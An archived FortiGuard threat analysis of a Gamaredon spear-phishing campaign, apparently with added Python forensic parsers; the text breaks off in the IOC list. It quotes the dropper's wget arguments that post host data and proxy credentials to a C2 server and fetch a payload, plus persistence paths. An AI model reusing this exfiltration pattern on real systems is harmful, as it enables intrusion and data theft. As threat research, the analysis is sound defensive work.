{
	"id": "9cf9a0b3-7380-4cc3-814d-a0436bd0b04e",
	"created_at": "2026-04-06T00:06:17.343426Z",
	"updated_at": "2026-04-10T03:37:04.248056Z",
	"deleted_at": null,
	"sha1_hash": "3a1fb440fc13569a3c5679ee614c38636f2d5cd6",
	"title": "The Gamaredon Group: A TTP Profile Analysis",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3710068,
	"plain_text": "The Gamaredon Group: A TTP Profile Analysis\r\nPublished: 2019-08-21 · Archived: 2026-04-05 13:43:37 UTC\r\nA FortiGuard Labs Threat Analysis\r\nFortiGuard Labs recently discovered a fresh malicious campaign being run by the Gamaredon Group, possibly targeting Ukrainian law enforcement and government agencies. We decided to provide an analysis of the current campaign, focusing on the tools and methods used by these malicious actors, to understand their methodology and what resources are needed to launch this type of attack.\r\nThe Gamaredon Group has been actively launching spear-phishing attacks against Ukrainian government and military departments since mid-2013. In one article published in the Kharkiv Observer, an independent Ukrainian online publication, an unnamed source stated that even the Ukrainian Presidential Administration has been attacked by malware developed by the Gamaredon Group. In addition, the anonymous cybersecurity experts referenced in the article connected the Gamaredon Group actors with Russian state-sponsored hackers.\r\nThe group is very active. In addition to the campaign we analyze in this report, they are also implicated in the spreading of a new Linux malware, EvilGnome.\r\nThe Gamaredon Group has been active for more than 6 years, and during that time their Tactics, Techniques, and Procedures (TTPs) have mostly remained the same. They primarily target Ukrainian organizations and resources using spear-phishing attacks, with military or similar documents as bait. Once they have found a victim, they deploy Remote Manipulation System (RMS) binaries via self-extracting archives and batch command files.\r\nCurrent Campaign Analysis\r\nAs an example, we decided to analyze one of their latest samples. The following archive caught our attention for exploiting the WinRAR unacev2 module vulnerability (the ACE path-traversal bug, CVE-2018-20250) and for having interesting content. 
In this case, it looked like someone was using the military conflict in Ukraine to deliver some sort of malware. A quick search for those patterns gave us the source of the archive: the Gamaredon Group.\r\nhttps://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html\r\nPage 1 of 21\r\nFigure 1. Files inside the archive\r\nThe archive contains several decoy files:\r\n1_Миротворець\\заява.jpg\r\nTranslation: Peacemaker\\statement.jpg\r\n2_Пiнчук\\Пiнчук Андрiй Юрiйович 27.12.1997.docx\r\nTranslation: Pinchuk\\Pinchuk Andrey Yuriyovych 27.12.1997.docx\r\nAndrey Pinchuk is a Ukrainian politician with alleged ties to Russia.\r\n3_Хавченко\\Хавченко Дмитро Василiйович 06.01.1966.docx\r\nTranslation: Havchenko\\Havchenko Dmitry Vasiliyovych 06.01.1966.docx\r\nDmitry Havchenko is a Ukrainian entrepreneur involved in Ukrainian politics who owns the cryptocurrency exchange WEX.\r\nD3i_GMCWAAAq_8u.jpg\r\nssu_zakon.docx\r\nTranslation: Security Service of Ukraine_The Law.docx\r\nSeveral text files\r\nAll of the text files contain old phone billing information, as well as coordinates, numbers, and addresses. We cannot determine whether this information is real. Even if it is, this kind of data can easily be found in public sources.\r\nFigure 2. Billing data\r\nAnother file used as bait is called ssu_zakon.docx. This document is just a note regarding the Security Service of Ukraine (SSU) law.\r\nFigure 3. Contents of ssu_zakon.docx\r\nThe archive also contains two MS Office documents named after the people named on the decoy image: Pinchuk Andriy Yuryevich 27.12.1997.docx and Havchenko Dmitry Vasilyevich 06.01.1966.docx. The document names are written in Ukrainian, while the content is written in Russian and is in fact just the translated text from the decoy image. 
The text provides brief information on the two persons, listing their registered addresses and details of their military careers.\r\nFigure 4. Corresponding document contents\r\nChecking the metadata of the two documents and of ssu_zakon.docx, we observed the following:\r\n2_Пiнчук\\Пiнчук Андрiй Юрiйович 27.12.1997.docx\r\nCreated: 10.04.2019 07:33:00\r\nModified: 10.04.2019 07:34:00\r\nCreated by: USER\r\n3_Хавченко\\Хавченко Дмитро Василiйович 06.01.1966.docx\r\nCreated: 10.04.2019 07:35:00\r\nModified: 10.04.2019 07:35:00\r\nCreated by: USER\r\nssu_zakon.docx\r\nCreated: 28.01.2019 06:42:00\r\nModified: 05.04.2019 05:05:00\r\nCreated by: USER\r\nThe files заява.jpg (statement.jpg) and D3i_GMCWAAAq_8u.jpg are identical. The original source of this picture is a post on a website called Mirotvorets (Peacemaker). The website is known for publishing the personal information of people who are considered to be “enemies of Ukraine.”\r\nThe text on the pictures below talks about Crimea, the military conflict, and two people who are suspected of sponsoring the presidential election campaign of the current president of Ukraine (Volodymyr Zelensky).\r\nFigure 5. Decoy images\r\nThe date printed on the image is 7 April 2019, the same day it was published on the Mirotvorets website. One interesting fact, however, is that WinRAR shows the last modification date of the file as 21.02.2019 22:03:\r\nFigure 6. File last modification time\r\nTo understand this time-travel mystery, we decided to check the ACE archive structure.\r\nFigure 7. 
ACE archive structure information\r\nAs you can see in figure 7, the ACE file header stores the entry's date and time in MS-DOS format: a 32-bit value whose high 16 bits pack the date (years since 1980, month, day) and whose low 16 bits pack the time (hour, minute, seconds/2). Converting 02/21/2019 22:03:06 to this format gives 0x4E55B063, which is stored little-endian as the byte sequence 63 B0 55 4E. Checking our archive, we can find the corresponding field:\r\nFigure 8. Timestamp hex value\r\nIf we now search for the byte pattern \\x63\\xB0\\x55\\x4E, we find a Metasploit Framework module that contains the same constant:\r\nFigure 9. Same value in the Metasploit module\r\nSearching further, we observed an earlier proof-of-concept script, published on 27 February 2019.\r\nFigure 10. Unacev2.dll vulnerability PoC\r\nThe date in the archive header is therefore not the real creation time but a constant inserted by the public generator scripts, which tells us that the attackers used publicly available scripts to pack their payload. The only timestamps we can currently trust to any degree are those in the MS Office document metadata (05.04.2019 and 10.04.2019), and even those are trivially editable by the author. Besides the date and time information, we also have a very generic username for the file creator: USER.\r\nExploit Analysis\r\nThe exploit drops three files on the file system, each with its own purpose.\r\nFirst, a shortcut called “Goggle Chrome.lnk” is placed on the user's desktop. As you can see in figure 11, the actor misspelled the browser name. This shortcut is intended to be clicked by the user instead of the proper “Google Chrome” shortcut. The shortcut has a hardcoded path to the icon, so the proper image is shown only if the user has the browser installed.\r\nFigure 11. 
Misspelled shortcut\r\nNext, the same shortcut is placed in the user's Startup folder, %AppData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Goggle Chrome.lnk. This copy is for persistence: files in the Startup folder are executed when the user logs on, so if the desktop shortcut is never clicked in the current session, the Startup copy is the attacker's fallback at the next reboot or logon.\r\nFinally, an executable called “win.exe” is placed in the user's profile directory as %userprofile%\\win.exe.\r\nAnalyzing the win.exe File\r\nThe file dropped in the user's profile folder is a password-protected self-extracting RAR archive. Its PE header carries a compilation timestamp (TimeDateStamp) of 24.04.2017 18:45:49 (GMT).\r\nFigure 12. Executable file compilation timestamp\r\nKnowing the SFX module's compilation date lets us identify the WinRAR version the attacker used. When an SFX archive is created, WinRAR prepends its own prebuilt SFX module, so the resulting executable keeps that module's build timestamp, which lies close to the timestamp of the installer from the same WinRAR release. The only version that matches is WinRAR 5.50 Beta 1 (x86): its installer is timestamped 24.04.2017 18:46:00 (GMT), 11 seconds after the SFX malware. Creating a self-extracting archive with this version, we obtained the same timestamp as the one in the malware.\r\nAdditionally, the malicious self-extracting archive carries a digital signature copied from a legitimate Microsoft tool, Sysinternals Autoruns. Because the signed hash no longer matches the file, the signature fails validation, as the figure below shows (the same result can be reproduced with signtool verify or Get-AuthenticodeSignature):\r\nFigure 13. Fake digital signature\r\nMoving on, to get the archive password we have to check the shortcut that points to it.
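The two timestamp checks used above, the MS-DOS stamp in the ACE header and the PE TimeDateStamp of the SFX module, as added example code written for this page (not code from the FortiGuard post): it packs a date into the DOS format, scans a buffer for the little-endian constant a generator script leaves behind, and reads the COFF TimeDateStamp of an executable so it can be compared with the packer's release build. The ACE fragment and the PE stub are constructed here; the only values taken from the post are the two dates.

```python
import struct
from datetime import datetime, timezone

# --- MS-DOS date/time, as stored in ACE, ZIP and RAR headers -----------------

def to_dos_timestamp(dt):
    """Pack a datetime as a 32-bit MS-DOS stamp: the date (year-1980, month, day)
    in the high word and the time (hour, minute, second/2) in the low word."""
    date = ((dt.year - 1980) << 9) | (dt.month << 5) | dt.day
    time = (dt.hour << 11) | (dt.minute << 5) | (dt.second // 2)
    return (date << 16) | time

def from_dos_timestamp(value):
    """Inverse of to_dos_timestamp; the format only has 2-second resolution."""
    date, time = value >> 16, value & 0xFFFF
    return datetime(1980 + (date >> 9), (date >> 5) & 0xF, date & 0x1F,
                    time >> 11, (time >> 5) & 0x3F, (time & 0x1F) * 2)

def dos_timestamp_bytes(dt):
    """The stamp as it sits on disk: little-endian, so 0x4E55B063 becomes 63 B0 55 4E."""
    return struct.pack('<I', to_dos_timestamp(dt))

def find_dos_timestamps(buf, stamps):
    """Offsets at which any of the given datetimes occurs as a little-endian DOS stamp.
    Feed it the constants known from public generator scripts to flag archives
    that were packed by such a script rather than by a real WinRAR session."""
    hits = []
    for dt in stamps:
        needle = dos_timestamp_bytes(dt)
        off = buf.find(needle)
        while off != -1:
            hits.append((off, dt))
            off = buf.find(needle, off + 1)
    return sorted(hits)

# --- PE TimeDateStamp, the field used to date the SFX modules -----------------

def pe_timestamp(data):
    """COFF TimeDateStamp (seconds since 1970) of a PE image as a UTC datetime,
    or None if the bytes are not an MZ/PE file."""
    if len(data) < 0x40 or data[:2] != b'MZ':
        return None
    pe_off = struct.unpack_from('<I', data, 0x3C)[0]       # e_lfanew
    if data[pe_off:pe_off + 4] != b'PE\0\0':
        return None
    stamp = struct.unpack_from('<I', data, pe_off + 8)[0]  # Machine, NumberOfSections, TimeDateStamp
    return datetime.fromtimestamp(stamp, tz=timezone.utc)

# --- constructed inputs (not the real samples) --------------------------------

POC_STAMP = datetime(2019, 2, 21, 22, 3, 6)                             # constant found in the PoC
WINRAR_550B1 = datetime(2017, 4, 24, 18, 45, 49, tzinfo=timezone.utc)  # SFX module stamp from the post

def sample_ace_fragment():
    """Six filler bytes, the PoC stamp, four more filler bytes; constructed here."""
    return b'\x00' * 6 + dos_timestamp_bytes(POC_STAMP) + b'\x00' * 4

def sample_pe_stub(build_time):
    """Minimal MZ header + PE signature + COFF header carrying build_time; constructed here."""
    dos_header = b'MZ' + b'\x00' * 0x3A + struct.pack('<I', 0x40)   # e_lfanew -> 0x40
    coff = struct.pack('<HHIIIHH', 0x14C, 0, int(build_time.timestamp()), 0, 0, 0, 0)
    return dos_header + b'PE\0\0' + coff

if __name__ == '__main__':
    print(hex(to_dos_timestamp(POC_STAMP)), dos_timestamp_bytes(POC_STAMP).hex())
    print(find_dos_timestamps(sample_ace_fragment(), [POC_STAMP]))
    print(pe_timestamp(sample_pe_stub(WINRAR_550B1)))
```

Because the DOS format drops the low bit of the seconds, 22:03:06 and 22:03:07 produce the same stamp; when comparing against a PoC constant, compare the packed value rather than the decoded datetime.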
\r\nFigure 14. Password inside the shortcut\r\nOnce we have the password, we can look inside win.exe. As can be seen in figure 15, it contains another executable, winlog.exe, along with an embedded SFX script that runs once the archive data has been extracted:\r\nSetup = winlog.exe (Execute after extraction)\r\nSilent = 1 (No windows are shown)\r\nOverwrite = 2 (Skip existing files; do not overwrite)\r\nFigure 15. Contents of “win.exe”\r\nLet's unpack this file and analyze its content.\r\nwinlog.exe is a 7-Zip SFX archive whose version resource describes it as “Email Microsoft Office Word” software, a product that does not exist. This time, the file is even older than the previous SFX archive: although its last modification date is 10.04.2019 13:55:42 (GMT), the compilation timestamp is 05.03.2016 12:06:17 (GMT). None of the 7-Zip release dates or versions corresponds to this timestamp, so the version-matching technique we used above did not work here.\r\nFigure 16. Description of “winlog.exe”\r\nThis self-extracting archive contains two files and a script that is launched at extraction:\r\n!@Install@!UTF-8!\r\nRunProgram=\"hidcon:5493.cmd\"  (Run the batch file with a hidden console window after extraction)\r\nGUIMode=\"2\" (No windows are shown)\r\nSelfDelete=\"1\" (Delete the archive after extraction)\r\n;!@InstallEnd@!\r\nTo look for hints about the software used to create this self-extracting archive, we opened the file in a plain text editor. Luckily, it contains version and copyright strings.\r\nFigure 17. 
Copyright inside the archive\r\nSearching for the copyright, version, and script strings, we found that a custom tool called Modified 7-Zip SFX module for installers, version 1.6.1 Stable build 3873, was used to create the malicious file. This tool is freely distributed on the Russian-speaking forum oszone. The tool produces a 7-Zip SFX archive with exactly the same compilation timestamp as the malicious file.\r\nFigure 18. Custom tool posted on the oszone forum\r\nNext, let's analyze the files contained in the archive.\r\nThe first one is called 5532.cmd, and it is a command prompt (batch) file. The second is an executable called config.exe.\r\nFigure 19. Inside the 7zip SFX archive\r\nLooking into the batch file, we can see that it is barely obfuscated and therefore easy to read.\r\nThe first thing we see is the configuration block. It has a hardcoded C2 server, a filename, and a user-agent:\r\nhxxp://lisingrout.ddns[.]net\r\nlibrelogout.exe\r\n\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Firefox/27.0\"\r\nAfter the configuration variables comes the main routine. First, the script reads the current user's proxy settings from the registry key HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings and saves the following values:\r\nProxyServer (Proxy server address)\r\nProxyUser (Proxy username)\r\nProxyPass (Proxy password)\r\nNext, it gets the computer name and derives a unique ID from it. It then calls the systeminfo utility and saves the whole output to a text file, in our case called ohJlkad.txt:\r\nsysteminfo \u003e ohJlkad.txt\r\nFigure 20. 
Initial data collection code\r\nAfter that, it waits for 40 seconds using the command:\r\ntimeout /T 40\r\nOnce the timer ends, it checks for internet connectivity by sending 14 ping requests to google.com, which also acts as a second delay:\r\nping -n 14 google.com\r\nOnce finished, it kills any running process with the filename stated in the configuration (“librelogout.exe”) and deletes that file, so the payload can be written fresh.\r\nFinally, it calls config.exe with the following arguments:\r\n--user-agent=[hardcoded UA]\r\n--post-data=”\r\nversiya=wrar\r\ncomp=%computername%\r\nid=[generated from computer name]\r\nsysinfo=[data from ohJlkad.txt]”\r\n“[C2 Server]”\r\n-q -N “[C2 Server]”\r\n-O “librelogout.exe”\r\nIf the user connects to the internet through a proxy, it passes additional arguments to config.exe:\r\n-e\r\n--http_proxy=http://[Proxy Server]\r\n--proxy-user=[Proxy username]\r\n--proxy-password=[Proxy password]\r\nAmong the arguments, one parameter stands out: versiya=wrar. The word versiya is a transliteration of the Russian Версия or Ukrainian Версія, meaning version. As it is set to wrar, we can guess that it identifies the delivery method: in this case, the initial file mirotvorec.rar contains an exploit for the WinRAR unacev2 module.\r\nFigure 21. Data exfiltration and payload dropping code\r\nAfter config.exe returns, the script launches the main payload fetched from the C2. To sum up, the script:\r\nCollects information about the infected host\r\nSends it to the C2 via config.exe\r\nDownloads and launches the main payload\r\nAnalyzing config.exe, we found that it is a legitimate build of wget (version 1.11.4) with OpenSSL support, compiled for Windows. The file is quite old: its compilation date goes back to 2009. 
Apparently the attackers decided not to reinvent the wheel and simply used an open-source tool for exfiltrating the host data and downloading the main payload.\r\nGoing Deep into the Shortcut\r\nIn addition to analyzing their techniques, we also decided to collect more information about the attackers. Fortunately, the shortcut they made helps us here.\r\nWindows shortcuts are small files that make life easier by providing a fast way to reach files, applications, and URLs. They also simplify the forensic analysis of malicious campaigns, because a .lnk file stores a good deal of information about the machine it was created on that is never shown to the user.\r\nFirst, let's check “Goggle Chrome.lnk” by opening its properties:\r\nFigure 22. Artifacts in the shortcut\r\nFirst, we see that the shortcut contains the Russian string Доступ в Интернет in the comment field, which translates to Access to the Internet. This text is shown when the mouse hovers over the shortcut. The real Google Chrome shortcut carries this comment too, in the language of the system that created it. So we can infer that a Windows installation with the Russian language pack was used to build the malicious shortcut.\r\nAnother artifact left by the attackers is the password they used to unpack win.exe. -p is the WinRAR SFX switch that supplies the extraction password, so the rest of the string, fvthbrfycrbte,k.lrb, is the password. If you switch your keyboard layout to Russian and type these characters, you recover an obscene phrase in Russian, “американскиеу**юдки”, which translates as “American b**tards”. Is this an Easter egg left by the Gamaredon Group?\r\nNext, let's move to the shortcut internals. Using a parser for the .lnk structure, we can extract more information from the file. 
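As added example code for this section (ours, not FortiGuard's and not the LNK Parser tool), here is a minimal MS-SHLLINK reader that pulls out the artifacts the post relies on: the target timestamps from the header, the volume serial number and local base path from LinkInfo, the command-line arguments (and the -p password inside them), and the TrackerDataBlock's MachineID plus the MAC address embedded in its version-1 ObjectID GUID. It also re-types the password on a ЙЦУКЕН layout, which is the manual trick described above. The .lnk bytes are constructed from the values the post reports for Goggle Chrome.lnk, not the real sample.

```python
import struct
import uuid
from datetime import datetime, timedelta, timezone

# LinkFlags (MS-SHLLINK 2.1.1), StringData order, and the ExtraData block we pivot on
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_ARGUMENTS, IS_UNICODE = 0x01, 0x02, 0x20, 0x80
STRING_FLAGS = [0x04, 0x08, 0x10, 0x20, 0x40]
STRING_NAMES = ['name', 'relative_path', 'working_dir', 'arguments', 'icon_location']
TRACKER_SIG = 0xA0000003
EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)

# QWERTY -> ЙЦУКЕН: what the attacker's keystrokes produce under a Russian layout
_QWERTY = "qwertyuiop[]asdfghjkl;'zxcvbnm,./"
_JCUKEN = "йцукенгшщзхъфывапролджэячсмитьбю."
LAYOUT = {q: j for q, j in zip(_QWERTY, _JCUKEN)}
LAYOUT.update({q.upper(): j.upper() for q, j in zip(_QWERTY, _JCUKEN)})

def ru_layout(text):
    """Re-type Latin characters on a ЙЦУКЕН layout; unmapped characters pass through."""
    return ''.join(LAYOUT.get(c, c) for c in text)

def sfx_password(arguments):
    """Password from a WinRAR SFX '-p<password>' switch, or None."""
    for token in arguments.split():
        if token.startswith('-p') and len(token) > 2:
            return token[2:]
    return None

def filetime_to_dt(ft):
    """Windows FILETIME (100 ns ticks since 1601) to an aware datetime."""
    return EPOCH_1601 + timedelta(microseconds=ft // 10)

def parse_lnk(data):
    """Attribution artifacts from a .lnk: target timestamps, volume serial, local path,
    StringData (arguments), and the TrackerDataBlock's machine name and MAC address."""
    if len(data) < 0x4C or struct.unpack_from('<I', data, 0)[0] != 0x4C:
        raise ValueError('not a Shell Link header')
    flags = struct.unpack_from('<I', data, 0x14)[0]
    ctime, _atime, wtime = struct.unpack_from('<3Q', data, 0x1C)
    out = {'target_created': filetime_to_dt(ctime), 'target_modified': filetime_to_dt(wtime)}
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:
        pos += 2 + struct.unpack_from('<H', data, pos)[0]
    if flags & HAS_LINK_INFO:
        li_size, _hdr, li_flags, vol_off, base_off = struct.unpack_from('<5I', data, pos)
        if li_flags & 0x01:                      # VolumeIDAndLocalBasePath
            serial = struct.unpack_from('<I', data, pos + vol_off + 8)[0]
            out['drive_serial'] = '%04x-%04x' % (serial >> 16, serial & 0xFFFF)
            end = data.index(b'\x00', pos + base_off)
            out['local_base_path'] = data[pos + base_off:end].decode('cp1251')
        pos += li_size
    for flag, name in zip(STRING_FLAGS, STRING_NAMES):   # StringData, fixed order, count-prefixed
        if flags & flag:
            count = struct.unpack_from('<H', data, pos)[0]
            width = 2 if flags & IS_UNICODE else 1
            raw = data[pos + 2:pos + 2 + count * width]
            out[name] = raw.decode('utf-16-le' if width == 2 else 'cp1251')
            pos += 2 + count * width
    # ExtraData: find the TrackerDataBlock by signature instead of walking every block
    idx = data.find(struct.pack('<I', TRACKER_SIG), pos)
    if idx >= 4 and struct.unpack_from('<I', data, idx - 4)[0] == 0x60:
        body = data[idx + 4:idx + 4 + 0x58]      # Length, Version, MachineID, Droid, DroidBirth
        out['machine_id'] = body[8:24].split(b'\x00', 1)[0].decode('cp1251')
        droid_file = uuid.UUID(bytes_le=body[40:56])   # ObjectID: version-1 UUID carrying the NIC MAC
        if droid_file.version == 1:
            mac = '%012X' % droid_file.node
            out['mac'] = ':'.join(mac[i:i + 2] for i in range(0, 12, 2))
    if 'arguments' in out and sfx_password(out['arguments']):
        out['sfx_password'] = sfx_password(out['arguments'])
        out['sfx_password_ru'] = ru_layout(out['sfx_password'])
    return out

def build_sample_lnk():
    """Constructed stand-in for Go ggle Chrome.lnk using the values the post reports;
    only the fields parse_lnk reads are populated, and the GUID time fields are made up."""
    def filetime(dt):
        return ((dt - EPOCH_1601) // timedelta(microseconds=1)) * 10
    created = datetime(2019, 4, 8, 9, 27, 6, tzinfo=timezone.utc)
    clsid = uuid.UUID('00021401-0000-0000-C000-000000000046').bytes_le
    flags = HAS_LINK_INFO | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack('<I16sIIQQQIIIHHII', 0x4C, clsid, flags, 0x20,
                         filetime(created), filetime(created), filetime(created),
                         0, 0, 1, 0, 0, 0, 0)
    base_path = b'C:\\Users\\USER\\win.exe\x00'
    volume_id = struct.pack('<IIII', 0x11, 3, 0x3C766C45, 0x10) + b'\x00'  # DRIVE_FIXED, serial, empty label
    vol_off = 0x1C
    base_off = vol_off + len(volume_id)
    suffix_off = base_off + len(base_path)
    link_info = struct.pack('<7I', suffix_off + 1, 0x1C, 0x01, vol_off, base_off, 0, suffix_off)
    link_info += volume_id + base_path + b'\x00'
    args = '-pfvthbrfycrbte,k.lrb'.encode('utf-16-le')
    string_data = struct.pack('<H', len(args) // 2) + args
    droid_volume = uuid.UUID(int=0).bytes_le
    droid_file = uuid.UUID(fields=(0x1F3A5C21, 0x59E4, 0x11E9, 0x8A, 0x6D, 0x080027BCC224)).bytes_le
    tracker = struct.pack('<4I', 0x60, TRACKER_SIG, 0x58, 0) + b'user-pc'.ljust(16, b'\x00')
    tracker += (droid_volume + droid_file) * 2   # Droid and DroidBirth
    return header + link_info + string_data + tracker + struct.pack('<I', 0)  # terminal block
```

The TrackerDataBlock is only present when the target lived on a volume with link tracking enabled, so its absence is not evidence of tampering; when it is present, the 08:00:27 prefix in the recovered MAC is the VirtualBox OUI, which is what identified the build VM here.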
We decided to use LNK Parser, a tool that generates very detailed HTML reports.\r\nFigure 23. Part of the report generated by LNK Parser\r\nAs the report contains quite a lot of information, we will focus on the most interesting pieces:\r\nThe .lnk file was created on 08.04.2019 09:27:06 (UTC).\r\nThe shortcut was created on a drive with the serial number 3c76-6c45.\r\nAnother path is hardcoded in the shortcut: C:\\Users\\USER\\win.exe. This is probably the same USER that created the decoy MS Office documents.\r\nPC NetBIOS name: user-pc\r\nMAC address of the machine: 08:00:27:BC:C2:24 (the 08:00:27 prefix is the VirtualBox OUI)\r\nThe last two values come from the shortcut's TrackerDataBlock: the NetBIOS name is its MachineID field, and the MAC address is the node part of the version-1 ObjectID GUID, which Windows derives from the NIC address of the machine the link was created on.\r\nWe decided to use this information to search for other samples containing the same MAC address, drive serial number, or other unique data from the shortcut.\r\nOnce such samples were found, we analyzed them and extracted further information that could help with attribution. The general behavior of the samples was mostly the same: SFX archive, batch command file, shortcuts. The only parts that differed were the bait files and sometimes the batch scripts.\r\nFirst, we looked at a sample very similar to the one we researched in depth: mirotvorec.rar. The name of the archive is that of the website the decoy image in figure 5 was taken from. There were only three main differences: the lack of decoy files (the text files and ssu_zakon.docx), different icons for win.exe and winlog.exe, and the user-agent string. The third difference is the user-agent string. 
In this sample the script uses:\r\n\"Mozilla/5.0 (Linux; Android 7.1.1; SM-J510H Build/NMF26X) Mobile Safari/537.36\"\r\nIt looks like the actors are still experimenting with the campaign, trying different patterns by changing the bait and slightly modifying the dropper.\r\nWe also discovered a non-political sample called vpnclient-win-msi-5.0.07.0410-k9.exe. This sample does not use the WinRAR unacev2.dll vulnerability; instead it contains a legitimate VPN client tool along with a malicious script that is launched in the background. Analyzing the shortcut file used in the sample, we found other interesting information left by the actors.\r\nThe sample hash is 5e16a71c7b99cb2780c31af34b268b78525b2b8fed55ff9e7bd4db8b1ba66f90.\r\nData extracted from the shortcut included:\r\nCreated: 19.03.2019 07:49:13 (UTC)\r\nC:\\Users\\Carson\\1.exe\r\nCarson (C:\\Пользователи)\r\nNetBIOS name: user-pc\r\nDrive serial number: 3c76-6c45\r\nMAC address: 08:00:27:BC:C2:24\r\nHere we can see the username of the attacker's OS account, Carson, and the localized folder name Пользователи, which is what a Russian-language Windows displays for C:\\Users. The NetBIOS name, hard drive serial number, and MAC address remained the same.\r\nThis sample differs slightly in its unpacking method: instead of the shortcut, the attackers hid the password inside the batch script.\r\nFigure 24. Password hardcoded in the script\r\nAs in the previous samples, the password is an obscene Russian phrase typed on an English keyboard layout.\r\nAnother sample that caught our attention was a .lnk shortcut file called 6228. 
The hash of the file is 995e6e0f90c58c82744545bf133b8c4c17decbe851953b0ffe5b21d625cade7d, and some of the extracted data follows:\r\nCreated 01.07.2019 10:36:33 (UTC)\r\nStrings\r\n_7-ZIP (F:\\VZLOM\\SBORKA_SCR)\r\nF:\\VZLOM\\SBORKA_SCR\\_7-ZIP\\WinRAR.exe\r\nNew password used: “dst,bntct,zd;jgegbyljcrbtcerb”\r\nPC NetBIOS name: шаман-пк\r\nDrive serial number: 3c76-6c45\r\nMAC address: 08:00:27:BC:C2:24\r\nThis time, we observe that the actor changed the VM's PC name from user-pc to shaman-pc (written in Russian). The MAC address and drive serial number are the same. Other interesting artifacts are the paths they forgot to clean out. VZLOM (взлом) is Russian for hacking, and SBORKA_SCR (сборка) means an SCR build or assembly kit, which suggests they use other specialized tooling to generate .scr malware. Judging by the drive letter F, these tools are probably stored on a USB flash drive or a shared folder attached to the VM.\r\nAnother trace the group left behind is the new SFX unpacking password, “dst,bntct,zd;jgegbyljcrbtcerb”, which is again an obscene Russian phrase typed on an English keyboard layout.\r\nBesides this, other similar samples were observed:\r\n1. 0a6aae425a5e36f68b5da69157d2df4e7d836933adfd0696c389097ecb4a0fd7\r\nLNK shortcut file\r\nCreation date 04/12/2019 10:44:08 UTC\r\nLast modified 05/06/2019 11:45:30 UTC\r\nNew password used: gblfhsuyjqyst\r\n2. 79fd962eb0c256f32786dab4d42cb416f6c1e6766bf0e2dcafdf5ffa2c5e61c1\r\nMS Office document\r\nCreate date: 2019:07:22 12:08:00 (GMT)\r\nAuthor: mmkrasny\r\nLast modified by: Користувач Windows (Ukrainian for “Windows User”)\r\nC2: wifc[.]website\r\nThis sample uses VBA macros to drop a payload. Checking the C2, we see that it resolves to 5.252.193[.]204. From another malicious domain that shares the same IP address, wifu[.]site, an additional sample was retrieved:\r\n3. 
bc39db24919b69e80bfb534204f4441a162ca336379bf9eb66b038e039889aac\r\n7zip SFX archive\r\nTimeDateStamp: 31.12.2012 00:38:51 (GMT)\r\nContains 3 files:\r\n8331.txt\r\n13446.cmd\r\n14638\r\nInside the batch script 13446.cmd, which differs a little from the one discussed above, we found this additional information:\r\nC2: hxxp://bits-tor[.]host\r\nContains another password: whevelfrb\r\nSchedules a task to achieve persistence\r\nThe information extracted from the samples can now be used to search for other campaigns run by this group, or to link older campaigns to the same actor.\r\nAttackers Profile\r\nAfter analyzing the data left inside the samples, we summarized what we had collected to get an idea of who hides behind this group.\r\nOn one hand, these actors have been operating since mid-2013, so they have more than 6 years of experience.\r\nThey are not asking for a ransom.\r\nThey only target information from the military, government, and other high-level Ukrainian sources.\r\nThe main infection strategy is spear-phishing, with well-assembled bait documents that sometimes cannot be found in public.\r\nThey use publicly available legitimate tools to avoid detection and to create their malicious samples.\r\nOn the other hand, the traces they left in the malware highlight some basic mistakes.\r\nThey use poorly obfuscated batch scripts that can be analyzed easily.\r\nThe leftover paths inside the shortcuts contain usernames, folders, and file names. 
For state-sponsored hackers this is very risky, because any such piece of information could unveil the author.\r\nMuch of the data is written in Russian and not in Ukrainian.\r\nThe passwords contain hateful statements in Russian that look like personal messages from the actor. This type of behavior is typical of authors seeking self-affirmation rather than of professional cybercriminals.\r\nConclusion\r\nWhile analyzing a campaign run by the Gamaredon group, we discovered the tools they used to prepare the attack and found artifacts left behind by the actors that allowed us to perform a large amount of forensic analysis. No doubt the group has strong Russian ties, judging by how much of that language is used in the malware.\r\nSummarizing our observations regarding the Gamaredon group, we can say that the tools and methods used are more likely to be associated with political activists than with special services. Unfortunately, we do not have enough proof to be sure about that. 
Further monitoring of their campaigns could probably show us the real face of Gamaredon.\r\n-= FortiGuard Lion Team =-\r\nMITRE ATT\u0026CK Matrix\r\nIOC\r\n5.252.193[.]204 - Malicious\r\nhxxp://lisingrout.ddns[.]net - Malicious\r\nhxxp://bits-tor[.]host - Malicious\r\nhxxp://bits-tor[.]site - Malicious\r\nhxxp://usbqueshions.ddns[.]net - Malicious\r\nhxxp://librework.ddns[.]net - Malicious\r\nhxxp://wifc[.]website - Malicious\r\nhxxp://wifu[.]site - Malicious\r\n04ed2ad4fa67c8abd635d34017c3d04813690a91282a0446c0505b2af97ce48b - W32/PossibleThreat\r\n0a6aae425a5e36f68b5da69157d2df4e7d836933adfd0696c389097ecb4a0fd7 - LNK/Agent.GP!tr\r\n18cd658fac1dd52a75b4eb6558d06dfe5be0e4db7078d72f663c44507449168c - BAT/Pterodo.QW!tr\r\n257f7f67c59ec8f3837c7e4c99b1dc20c5cd0273bd940beef46d5e641393be37 - W32/Pterodo.RN!tr\r\n258ecb059c15178caed309a4861421d9f2436e70fb36fb1bf05e95d8d8d7c7e3 - BAT/Pterodo.SV!tr\r\n3725f82661852d89874a3748302bbf27990d25fc10d28831f1ad35a6c6d3b4bd - LNK/Agent.GP!tr\r\n46638ca3be6cdbd302e84c26bf14bfda6ed0c1353808914b40246c40fdb5b8ed - W32/Generic!tr\r\n5b2c7b05368d825a4f3b10d74074d0803234f918166436d3e48ef7f9faf66461 - W32/Pterodo.RN!tr\r\n5e16a71c7b99cb2780c31af34b268b78525b2b8fed55ff9e7bd4db8b1ba66f90 - W32/Generic!tr\r\n6b5f4aea458fb737e213714b3dda51f31b03ccb53a6a0501ee608c1bfd0cebb7 - BAT/Pterodo.SV!tr\r\n79fd962eb0c256f32786dab4d42cb416f6c1e6766bf0e2dcafdf5ffa2c5e61c1 - 